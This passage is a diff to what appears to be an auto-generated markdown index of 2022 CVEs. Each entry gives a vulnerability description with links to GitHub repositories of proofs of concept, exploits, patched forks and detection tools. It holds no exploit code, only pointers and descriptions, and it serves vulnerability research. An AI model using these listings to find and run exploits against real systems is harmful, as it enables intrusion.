+- [MrEmpy/CVE-2022-4944](https://github.com/MrEmpy/CVE-2022-4944)
+
### CVE-2022-5561
- [Kvi74/CVE-2022-5561](https://github.com/Kvi74/CVE-2022-5561)
### CVE-2022-8475
- [Kvi74/CVE-2022-8475](https://github.com/Kvi74/CVE-2022-8475)
+### CVE-2022-10270
+- [baimaobg/sunflower_exp](https://github.com/baimaobg/sunflower_exp)
+
### CVE-2022-14733
- [hkzck/CVE-2022-14733](https://github.com/hkzck/CVE-2022-14733)
@@ -978,6 +10191,7 @@
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224)
+- [hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224)
### CVE-2022-20229 (2022-07-13)
@@ -1002,6 +10216,14 @@
- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347)
+- [hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347)
+
+### CVE-2022-20360 (2022-08-09)
+
+In setChecked of SecureNfcPreferenceController.java, there is a missing permission check. This could lead to local escalation of privilege from the guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228314987
+
+
+- [726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360](https://github.com/726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)
### CVE-2022-20361 (2022-08-09)
@@ -1017,6 +10239,92 @@
- [Markakd/bad_io_uring](https://github.com/Markakd/bad_io_uring)
+### CVE-2022-20413 (2022-10-11)
+
+In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-235850634
+
+
+- [pazhanivel07/frameworks_av-r33_CVE-2022-20413](https://github.com/pazhanivel07/frameworks_av-r33_CVE-2022-20413)
+
+### CVE-2022-20421 (2022-10-11)
+
+In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel
+
+
+- [0xkol/badspin](https://github.com/0xkol/badspin)
+
+### CVE-2022-20452 (2022-11-08)
+
+In initializeFromParcelLocked of BaseBundle.java, there is a possible method arbitrary code execution due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-240138318
+
+
+- [michalbednarski/LeakValue](https://github.com/michalbednarski/LeakValue)
+
+### CVE-2022-20456 (2023-01-24)
+
+In AutomaticZenRule of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703780
+
+
+- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456)
+
+### CVE-2022-20470 (2022-12-13)
+
+In bindRemoteViewsService of AppWidgetServiceImpl.java, there is a possible way to bypass background activity launch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-234013191
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470)
+
+### CVE-2022-20473 (2022-12-13)
+
+In toLanguageTag of LocaleListCache.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-239267173
+
+
+- [Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473)
+- [Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473)
+
+### CVE-2022-20489 (2023-01-24)
+
+In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703460
+
+
+- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old)
+- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489)
+
+### CVE-2022-20490 (2023-01-24)
+
+In multiple functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703505
+
+
+- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490)
+
+### CVE-2022-20492 (2023-01-24)
+
+In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242704043
+
+
+- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492)
+
+### CVE-2022-20493 (2023-01-24)
+
+In Condition of Condition.java, there is a possible way to grant notification access due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242846316
+
+
+- [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493)
+
+### CVE-2022-20494 (2023-01-24)
+
+In AutomaticZenRule of AutomaticZenRule.java, there is a possible persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243794204
+
+
+- [Supersonic/CVE-2022-20494](https://github.com/Supersonic/CVE-2022-20494)
+
+### CVE-2022-20607 (2022-12-16)
+
+In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N/A
+
+
+- [sumeetIT/CVE-2022-20607](https://github.com/sumeetIT/CVE-2022-20607)
+
### CVE-2022-20699 (2022-02-03)
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
@@ -1054,6 +10362,13 @@
- [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability)
+### CVE-2022-21306 (2022-01-19)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [hktalent/CVE-2022-21306](https://github.com/hktalent/CVE-2022-21306)
+
### CVE-2022-21340 (2022-01-19)
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
@@ -1115,6 +10430,15 @@
- [Cappricio-Securities/CVE-2022-21500](https://github.com/Cappricio-Securities/CVE-2022-21500)
+### CVE-2022-21587 (2022-10-18)
+
+Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [hieuminhnv/CVE-2022-21587-POC](https://github.com/hieuminhnv/CVE-2022-21587-POC)
+- [rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit)
+- [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-)
+
### CVE-2022-21658 (2022-01-20)
Rust is a multi-paradigm, general-purpose programming language designed for performance and safety, especially safe concurrency. The Rust Security Response WG was notified that the `std::fs::remove_dir_all` standard library function is vulnerable a race condition enabling symlink following (CWE-363). An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete. Rust 1.0.0 through Rust 1.58.0 is affected by this vulnerability with 1.58.1 containing a patch. Note that the following build targets don't have usable APIs to properly mitigate the attack, and are thus still vulnerable even with a patched toolchain: macOS before version 10.10 (Yosemite) and REDOX. We recommend everyone to update to Rust 1.58.1 as soon as possible, especially people developing programs expected to run in privileged contexts (including system daemons and setuid binaries), as those have the highest risk of being affected by this. Note that adding checks in your codebase before calling remove_dir_all will not mitigate the vulnerability, as they would also be vulnerable to race conditions like remove_dir_all itself. The existing mitigation is working as intended outside of race conditions.
@@ -1142,6 +10466,8 @@
- [guestzz/CVE-2022-21661](https://github.com/guestzz/CVE-2022-21661)
- [safe3s/CVE-2022-21661](https://github.com/safe3s/CVE-2022-21661)
- [WellingtonEspindula/SSI-CVE-2022-21661](https://github.com/WellingtonEspindula/SSI-CVE-2022-21661)
+- [daniel616/CVE-2022-21661-Demo](https://github.com/daniel616/CVE-2022-21661-Demo)
+- [sealldeveloper/CVE-2022-21661-PoC](https://github.com/sealldeveloper/CVE-2022-21661-PoC)
- [p4ncontomat3/CVE-2022-21661](https://github.com/p4ncontomat3/CVE-2022-21661)
- [CharonDefalt/WordPress--CVE-2022-21661](https://github.com/CharonDefalt/WordPress--CVE-2022-21661)
@@ -1166,6 +10492,13 @@
- [docfate111/CVE-2022-21789](https://github.com/docfate111/CVE-2022-21789)
+### CVE-2022-21839 (2022-01-11)
+
+Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability
+
+
+- [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-)
+
### CVE-2022-21877 (2022-01-11)
Storage Spaces Controller Information Disclosure Vulnerability
@@ -1190,6 +10523,7 @@
- [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882)
- [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc)
- [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882)
+- [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882)
### CVE-2022-21894 (2022-01-11)
@@ -1198,6 +10532,9 @@
- [Wack0/CVE-2022-21894](https://github.com/Wack0/CVE-2022-21894)
- [ASkyeye/CVE-2022-21894-Payload](https://github.com/ASkyeye/CVE-2022-21894-Payload)
+- [Wack0/batondrop_armv7](https://github.com/Wack0/batondrop_armv7)
+- [bakedmuffinman/BlackLotusDetection](https://github.com/bakedmuffinman/BlackLotusDetection)
+- [qjawls2003/BlackLotus-Detection](https://github.com/qjawls2003/BlackLotus-Detection)
- [nova-master/CVE-2022-21894-Payload-New](https://github.com/nova-master/CVE-2022-21894-Payload-New)
### CVE-2022-21907 (2022-01-11)
@@ -1217,6 +10554,8 @@
- [iveresk/cve-2022-21907](https://github.com/iveresk/cve-2022-21907)
- [Malwareman007/CVE-2022-21907](https://github.com/Malwareman007/CVE-2022-21907)
- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher)
+- [cassie0206/CVE-2022-21907](https://github.com/cassie0206/CVE-2022-21907)
+- [EzoomE/CVE-2022-21907-RCE](https://github.com/EzoomE/CVE-2022-21907-RCE)
- [asepsaepdin/CVE-2022-21907](https://github.com/asepsaepdin/CVE-2022-21907)
- [kamal-marouane/CVE-2022-21907](https://github.com/kamal-marouane/CVE-2022-21907)
@@ -1283,6 +10622,8 @@
A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall.
+- [4lucardSec/Sonic_CVE-2022-22274_poc](https://github.com/4lucardSec/Sonic_CVE-2022-22274_poc)
+- [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc)
- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656)
### CVE-2022-22296 (2022-01-24)
@@ -1328,6 +10669,7 @@
- [kmeps4/CVE-2022-22620](https://github.com/kmeps4/CVE-2022-22620)
- [springsec/CVE-2022-22620](https://github.com/springsec/CVE-2022-22620)
+- [bb33bb/dkjiayu.github.io](https://github.com/bb33bb/dkjiayu.github.io)
### CVE-2022-22629 (2022-09-23)
@@ -1357,6 +10699,13 @@
- [Benasin/CVE-2022-22720](https://github.com/Benasin/CVE-2022-22720)
+### CVE-2022-22733 (2022-01-20)
+
+Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
+
+
+- [Zeyad-Azima/CVE-2022-22733](https://github.com/Zeyad-Azima/CVE-2022-22733)
+
### CVE-2022-22814 (2022-03-10)
The System Diagnosis service of MyASUS before 3.1.2.0 allows privilege escalation.
@@ -1500,6 +10849,8 @@
- [LY613313/CVE-2022-22947](https://github.com/LY613313/CVE-2022-22947)
- [SiJiDo/CVE-2022-22947](https://github.com/SiJiDo/CVE-2022-22947)
- [qq87234770/CVE-2022-22947](https://github.com/qq87234770/CVE-2022-22947)
+- [Zh0um1/CVE-2022-22947](https://github.com/Zh0um1/CVE-2022-22947)
+- [Le1a/CVE-2022-22947](https://github.com/Le1a/CVE-2022-22947)
- [cc3305/CVE-2022-22947](https://github.com/cc3305/CVE-2022-22947)
### CVE-2022-22948 (2022-03-29)
@@ -1563,6 +10914,16 @@
- [k3rwin/spring-cloud-function-rce](https://github.com/k3rwin/spring-cloud-function-rce)
- [75ACOL/CVE-2022-22963](https://github.com/75ACOL/CVE-2022-22963)
- [dr6817/CVE-2022-22963](https://github.com/dr6817/CVE-2022-22963)
+- [iliass-dahman/CVE-2022-22963-POC](https://github.com/iliass-dahman/CVE-2022-22963-POC)
+- [charis3306/CVE-2022-22963](https://github.com/charis3306/CVE-2022-22963)
+- [lemmyz4n3771/CVE-2022-22963-PoC](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC)
+- [J0ey17/CVE-2022-22963_Reverse-Shell-Exploit](https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit)
+- [Mustafa1986/CVE-2022-22963](https://github.com/Mustafa1986/CVE-2022-22963)
+- [SourM1lk/CVE-2022-22963-Exploit](https://github.com/SourM1lk/CVE-2022-22963-Exploit)
+- [randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE](https://github.com/randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE)
+- [gunzf0x/CVE-2022-22963](https://github.com/gunzf0x/CVE-2022-22963)
+- [nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963](https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963)
+- [HenriV-V/Exploit-for-CVE-2022-22963](https://github.com/HenriV-V/Exploit-for-CVE-2022-22963)
- [BearClaw96/CVE-2022-22963-Poc-Bearcules](https://github.com/BearClaw96/CVE-2022-22963-Poc-Bearcules)
- [jrbH4CK/CVE-2022-22963](https://github.com/jrbH4CK/CVE-2022-22963)
@@ -1637,7 +10998,13 @@
- [clemoregan/SSE4-CVE-2022-22965](https://github.com/clemoregan/SSE4-CVE-2022-22965)
- [devengpk/CVE-2022-22965](https://github.com/devengpk/CVE-2022-22965)
- [zangcc/CVE-2022-22965-rexbb](https://github.com/zangcc/CVE-2022-22965-rexbb)
+- [ajith737/Spring4Shell-CVE-2022-22965-POC](https://github.com/ajith737/Spring4Shell-CVE-2022-22965-POC)
+- [c33dd/CVE-2022-22965](https://github.com/c33dd/CVE-2022-22965)
+- [gokul-ramesh/Spring4Shell-PoC-exploit](https://github.com/gokul-ramesh/Spring4Shell-PoC-exploit)
- [bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-](https://github.com/bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-)
+- [BKLockly/CVE-2022-22965](https://github.com/BKLockly/CVE-2022-22965)
+- [dbgee/Spring4Shell](https://github.com/dbgee/Spring4Shell)
+- [jakabakos/CVE-2022-22965-Spring4Shell](https://github.com/jakabakos/CVE-2022-22965-Spring4Shell)
- [sohamsharma966/Spring4Shell-CVE-2022-22965](https://github.com/sohamsharma966/Spring4Shell-CVE-2022-22965)
- [LucasPDiniz/CVE-2022-22965](https://github.com/LucasPDiniz/CVE-2022-22965)
@@ -1686,6 +11053,7 @@
- [DeEpinGh0st/CVE-2022-22978](https://github.com/DeEpinGh0st/CVE-2022-22978)
- [ducluongtran9121/CVE-2022-22978-PoC](https://github.com/ducluongtran9121/CVE-2022-22978-PoC)
- [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978)
+- [umakant76705/CVE-2022-22978](https://github.com/umakant76705/CVE-2022-22978)
- [Raghvendra1207/CVE-2022-22978](https://github.com/Raghvendra1207/CVE-2022-22978)
- [wan9xx/CVE-2022-22978-demo](https://github.com/wan9xx/CVE-2022-22978-demo)
@@ -1716,6 +11084,7 @@
ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.\n\nThe pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.\n\nThe memory safety bugs described above can be triggered by a remote host, causing the ping program to crash.\n\nThe ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur.
+- [Inplex-sys/CVE-2022-23093](https://github.com/Inplex-sys/CVE-2022-23093)
- [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit)
### CVE-2022-23131 (2021-11-22)
@@ -1737,6 +11106,9 @@
- [Kazaf6s/CVE-2022-23131](https://github.com/Kazaf6s/CVE-2022-23131)
- [SCAMagic/CVE-2022-23131poc-exp-zabbix-](https://github.com/SCAMagic/CVE-2022-23131poc-exp-zabbix-)
- [Vulnmachines/Zabbix-CVE-2022-23131](https://github.com/Vulnmachines/Zabbix-CVE-2022-23131)
+- [wr0x00/cve-2022-23131](https://github.com/wr0x00/cve-2022-23131)
+- [Arrnitage/CVE-2022-23131_exp](https://github.com/Arrnitage/CVE-2022-23131_exp)
+- [clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131](https://github.com/clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131)
- [r10lab/CVE-2022-23131](https://github.com/r10lab/CVE-2022-23131)
### CVE-2022-23222 (2022-01-14)
@@ -1770,6 +11142,13 @@
- [7BitsTeam/CVE-2022-23277](https://github.com/7BitsTeam/CVE-2022-23277)
+### CVE-2022-23303 (2022-01-17)
+
+The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494.
+
+
+- [skulkarni-mv/hostapd_mirror](https://github.com/skulkarni-mv/hostapd_mirror)
+
### CVE-2022-23305 (2022-01-18)
By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
@@ -1796,12 +11175,17 @@
- [TheGetch/CVE-2022-23378](https://github.com/TheGetch/CVE-2022-23378)
+### CVE-2022-23529
+- [despossivel/CVE-2022-23529-lab](https://github.com/despossivel/CVE-2022-23529-lab)
+- [hackintoanetwork/CVE-2022-23529-PoC](https://github.com/hackintoanetwork/CVE-2022-23529-PoC)
+
### CVE-2022-23614 (2022-02-04)
Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.
- [davwwwx/CVE-2022-23614](https://github.com/davwwwx/CVE-2022-23614)
+- [4rtamis/CVE-2022-23614](https://github.com/4rtamis/CVE-2022-23614)
### CVE-2022-23642 (2022-02-18)
@@ -1831,6 +11215,7 @@
- [danbudris/CVE-2022-23773-repro](https://github.com/danbudris/CVE-2022-23773-repro)
- [danbudris/CVE-2022-23773-repro-target](https://github.com/danbudris/CVE-2022-23773-repro-target)
+- [YouShengLiu/CVE-2022-23773-Reproduce](https://github.com/YouShengLiu/CVE-2022-23773-Reproduce)
### CVE-2022-23779 (2022-03-02)
@@ -1875,6 +11260,15 @@
- [netsectuna/CVE-2022-23909](https://github.com/netsectuna/CVE-2022-23909)
+### CVE-2022-23935 (2022-01-25)
+
+lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection.
+
+
+- [dpbe32/CVE-2022-23935-PoC-Exploit](https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit)
+- [cowsecurity/CVE-2022-23935](https://github.com/cowsecurity/CVE-2022-23935)
+- [BKreisel/CVE-2022-23935](https://github.com/BKreisel/CVE-2022-23935)
+
### CVE-2022-23940 (2022-03-07)
SuiteCRM through 7.12.1 and 8.x through 8.0.1 allows Remote Code Execution. Authenticated users with access to the Scheduled Reports module can achieve this by leveraging PHP deserialization in the email_recipients property. By using a crafted request, they can create a malicious report, containing a PHP-deserialization payload in the email_recipients field. Once someone accesses this report, the backend will deserialize the content of the email_recipients field and the payload gets executed. Project dependencies include a number of interesting PHP deserialization gadgets (e.g., Monolog/RCE1 from phpggc) that can be used for Code Execution.
@@ -1929,6 +11323,7 @@
- [kavishkagihan/CVE-2022-24112-POC](https://github.com/kavishkagihan/CVE-2022-24112-POC)
- [twseptian/cve-2022-24112](https://github.com/twseptian/cve-2022-24112)
- [Acczdy/CVE-2022-24112_POC](https://github.com/Acczdy/CVE-2022-24112_POC)
+- [wshepherd0010/CVE-2022-24112-Lab](https://github.com/wshepherd0010/CVE-2022-24112-Lab)
- [btar1gan/exploit_CVE-2022-24112](https://github.com/btar1gan/exploit_CVE-2022-24112)
### CVE-2022-24122 (2022-01-29)
@@ -1996,6 +11391,13 @@
- [jet-pentest/CVE-2022-24449](https://github.com/jet-pentest/CVE-2022-24449)
+### CVE-2022-24481 (2022-04-15)
+
+Windows Common Log File System Driver Elevation of Privilege Vulnerability
+
+
+- [fr4nkxixi/CVE-2022-24481-POC](https://github.com/fr4nkxixi/CVE-2022-24481-POC)
+
### CVE-2022-24483 (2022-04-15)
Windows Kernel Information Disclosure Vulnerability
@@ -2047,6 +11449,8 @@
- [Lay0us1/CVE-2022-24637](https://github.com/Lay0us1/CVE-2022-24637)
- [hupe1980/CVE-2022-24637](https://github.com/hupe1980/CVE-2022-24637)
- [icebreack/CVE-2022-24637](https://github.com/icebreack/CVE-2022-24637)
+- [Pflegusch/CVE-2022-24637](https://github.com/Pflegusch/CVE-2022-24637)
+- [0xM4hm0ud/CVE-2022-24637](https://github.com/0xM4hm0ud/CVE-2022-24637)
- [0xRyuk/CVE-2022-24637](https://github.com/0xRyuk/CVE-2022-24637)
### CVE-2022-24644 (2022-03-07)
@@ -2113,6 +11517,7 @@
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration.
+- [JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715)
- [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715)
- [d4rkb0n3/CVE-2022-24715-go](https://github.com/d4rkb0n3/CVE-2022-24715-go)
@@ -2121,7 +11526,11 @@
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
+- [JacobEbben/CVE-2022-24716](https://github.com/JacobEbben/CVE-2022-24716)
- [joaoviictorti/CVE-2022-24716](https://github.com/joaoviictorti/CVE-2022-24716)
+- [pumpkinpiteam/CVE-2022-24716](https://github.com/pumpkinpiteam/CVE-2022-24716)
+- [doosec101/CVE-2022-24716](https://github.com/doosec101/CVE-2022-24716)
+- [antisecc/CVE-2022-24716](https://github.com/antisecc/CVE-2022-24716)
### CVE-2022-24734 (2022-03-09)
@@ -2209,6 +11618,14 @@
- [n8tz/CVE-2022-24999](https://github.com/n8tz/CVE-2022-24999)
+### CVE-2022-25012 (2022-03-01)
+
+Argus Surveillance DVR v4.0 employs weak password encryption.
+
+
+- [s3l33/CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012)
+- [deathflash1411/cve-2022-25012](https://github.com/deathflash1411/cve-2022-25012)
+
### CVE-2022-25018 (2022-03-01)
Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages.
@@ -2335,6 +11752,7 @@
- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313)
+- [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313)
### CVE-2022-25314 (2022-02-18)
@@ -2349,6 +11767,14 @@
- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315)
+- [hshivhare67/external_expat_v2.1.0_CVE-2022-25315](https://github.com/hshivhare67/external_expat_v2.1.0_CVE-2022-25315)
+
+### CVE-2022-25365 (2022-02-19)
+
+Docker Desktop before 4.5.1 on Windows allows attackers to move arbitrary files. NOTE: this issue exists because of an incomplete fix for CVE-2022-23774.
+
+
+- [followboy1999/CVE-2022-25365](https://github.com/followboy1999/CVE-2022-25365)
### CVE-2022-25375 (2022-02-20)
@@ -2382,7 +11808,9 @@
- [Wai-Yan-Kyaw/PDFKitExploit](https://github.com/Wai-Yan-Kyaw/PDFKitExploit)
- [LordRNA/CVE-2022-25765](https://github.com/LordRNA/CVE-2022-25765)
- [shamo0/PDFkit-CMD-Injection](https://github.com/shamo0/PDFkit-CMD-Injection)
+- [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765](https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765)
